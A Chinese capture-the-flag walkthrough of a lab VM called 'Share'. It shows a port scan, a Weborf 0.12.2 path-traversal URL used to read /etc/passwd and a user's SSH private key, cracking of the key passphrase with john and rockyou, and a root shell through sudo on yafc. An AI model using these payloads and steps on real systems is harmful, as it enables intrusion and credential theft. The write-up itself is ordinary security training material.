# 靶场搭建

下载:Share

下载、导入、Nat

IP: 192.168.1.132

# 渗透过程

# 信息初收集

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http-proxy Weborf (GNU/Linux)
| http-webdav-scan: 
|   WebDAV type: Apache DAV
|   Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_  Server Type: Weborf (GNU/Linux)
| http-methods: 
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-title: Weborf
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 960
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-timesyncd.service-mR66hj/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html

8080 端口能进行 PUT,那就传.

发现 403 了,再收集

发现 Weborf/0.12.2

搜一下,发现 exp: http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

是个 LFI,发现 passwd 只有 roottim 用户有用的

跑一下敏感文件,得到: http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa

拿到了私钥 rsa,使用私钥登录,发现需要一个密码的

哈希解密一下

┌──(root㉿kali)-[~]
└─# john --format=SSH id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovetim         (id_rsa)     
1g 0:00:00:00 DONE (2024-05-17 23:21) 2.702g/s 14270p/s 14270c/s 14270C/s badbitch..ilovetim
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码: ilovetim

# 提权

sudo -l 发现有个 yafc 工具,搜索发现是一个 ftp 的工具

有一个 shell 功能

直接 sudo 使用,执行 shell,OK 了家人拿到 root 权限了

# 小结

约翰约翰约翰!